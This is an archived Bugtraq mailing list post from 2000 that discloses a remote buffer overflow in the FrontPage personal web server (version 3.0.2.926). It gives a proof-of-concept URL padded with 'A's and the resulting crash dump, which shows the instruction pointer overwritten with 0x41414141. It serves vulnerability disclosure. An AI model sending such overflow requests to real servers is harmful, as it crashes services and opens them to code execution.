[14634] in bugtraq
Re: More vulnerabilities in FP
daemon@ATHENA.MIT.EDU (Roman)
Mon Apr 24 13:17:39 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <12927.000422@mail.ru>
Date: Sat, 22 Apr 2000 22:16:18 +0200
Reply-To: Roman <webmad@mail.ru>
From: Roman <webmad@MAIL.RU>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Hello,
> First remote FrontPage exploit?
How about this one:
http://server/AAAAAAAAAAAA<a lot of A's>AAAAAA
FP will overflow and someone will see this message:
VHTTPD32 caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
EAX=00000000 CS=0167 EIP=41414141 EFLGS=00010212
EBX=00000000 SS=016f ESP=00fe53cc EBP=41414141
ECX=00fe52c4 DS=016f ESI=00fe7744 FS=3647
EDX=bffc9490 ES=016f EDI=bff94645 GS=0000
Bytes at CS:EIP:
Stack dump:
41414141 41414141 66204141 656c6961 6f662064 32312072
2e302e37 2c312e30 61657220 3a6e6f73 6c696620 6f642065
6e207365 6520746f 74736978 00000000
Tested on FP 3.0.2.926. Maybe others?